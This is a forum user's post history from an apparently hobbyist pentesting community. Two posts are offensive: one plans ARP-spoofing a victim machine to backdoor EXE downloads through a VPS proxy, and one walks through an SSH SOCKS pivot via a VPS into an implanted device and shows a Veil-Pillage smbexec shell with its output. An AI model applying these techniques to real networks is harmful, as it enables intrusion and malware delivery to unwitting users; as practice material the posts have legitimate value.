Everything posted by jxg975

  1. Yeah, I just wanted to get HTTP data, not HTTPS. But I'll start with that. Thanks!
  2. Hi all! Hopefully this hasn't been posted anywhere else... I wanted to see if anyone could help me with an issue. Here's the scenario: I have a "victim" box (Windows 7) that I want to MITM using arpspoof. From there, the MITM machine (Kali) will redirect any incoming HTTP connections on port 80 to another server in the cloud (VPS) which is hosting a transparent proxy to backdoor any EXEs that pass through it. The idea is that I have a drop box on a LAN and MITM the victim machine. The victim then browses to the web to download PuTTY. During this, the victim is passing all the traffic through my drop box (Kali), which is redirecting the victim to the VPS in the cloud, which then re-redirects him to whatever site (in this case, PuTTY). I can't seem to find any good way to force an incoming connection on port 80 to redirect a user to the VPS on another IP and port... I've tried SSH local port forwarding, netcat relays, and iptables. I wanted to know if anyone out there has had any success with this...

     Image!

     [VICTIM Machine] --> [[MITM machine (kali)]] --> (router) ------------->INTERNET! ------->[VPS....which then forwards to original website] -------> (Putty.com or whatever)

     The victim browses to putty.com, the MITM machine redirects to my VPS in the cloud, the VPS has PEinjector (great tool, look it up!) which acts as a transparent proxy, which then forwards the connection to putty.com. Any thoughts/help/hints/etc. will help! Thanks.
  3. Hi all! Just wanted to share something that might help other Lan Turtlers out there. One of the things I wanted to do with my LAN Turtle was to pivot my tools from my local box through the Turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your Turtle.

     My setup: [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network]

     I ran into trouble trying to figure out how to set up an SSH proxychain to it... found this article, which worked right away: https://superuser.com/questions/332850/ssh-as-socks-proxy-through-multiple-hosts

     I used the first line, which was this command:

     ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p machine-b" machine-c

     Here, machine-b would be the username@ip_of_VPS_in_cloud and machine-c would be the Turtle, which should be root@localhost -p 2222. By replacing the "$PORT" with whatever you want (I used 9050, the default in the proxychains.conf), it would work flawlessly. Basically, what we are doing here is creating a SOCKS proxy through SSH that goes through our VPS in the cloud, and then logs into the Turtle (which already connects back to that VPS through AutoSSH). With this tunnel, all you need to do is open up your proxychains.conf (/etc/proxychains.conf) and edit the last line to reflect the port you used. After that, you are all set! In Kali, just prepend "proxychains" before the tool you want to use... for example! I wanted to be able to use Veil-Pillage from my local Kali box to get an SMBExec shell (because I already had credentials). So, by setting up the tunnel above, I ran:

     root@kali# proxychains ./Veil-Pillage

     which took me to the dialogue screen. I chose number 25, set my target (which was a Win7 VM) and my creds, and just hit run!

     Veil-Pillage: post-explotation framework | [Version]: 1.1.2
     =========================================================================
     [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
     =========================================================================
     [*] Executing module: Smbexec Shell...
     [*] Type 'exit' to exit the shell
     Trying protocol 445/SMB...
     Creating service SystemDiag...
     |S-chain|-<>-***.***.***.***-<><>-<><>-OK
     [!] Launching semi-interactive shell - Careful what you execute
     C:\Windows\system32>

     And there you have it!! I thought this should be useful for everyone out there. Another way of doing it is to use your Metasploit/Armitage instance in the VPS, use the meterpreter module, set up the SOCKS4 proxy, and then set up proxychains to reflect your VPS instance. Don't forget to add the route! Let me know your thoughts!

     TL;DR: SSH SOCKS proxy -- root@kali# ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p VPS-in-cloud" turtle-in-VPS, then change proxychains.conf, then "proxychains tool".
  4. Quick thing: Can anybody walk through the settings they have enabled on their OpenVPN Access Server? I have the "client gateway" box checked, and the correct subnet to route to, but the VPN still won't route to my internal network (when I'm externally connected to the Access Server). Anybody have clear directions on what settings they have enabled on the Access Server?
  5. Hey Darren, quick question: I wanted to set up my Turtle with AutoSSH, but my server's SSH port is not 22 (I changed it to a different port). I was able to create an SSH tunnel using the command line from the Turtle, but I can't seem to get it to work from the module itself. I tried to add my port number to the end of the host info (i.e. user@serverport -p XXXX), but every time I try to save it, it drops the port number. Any help? Thanks! -- Jon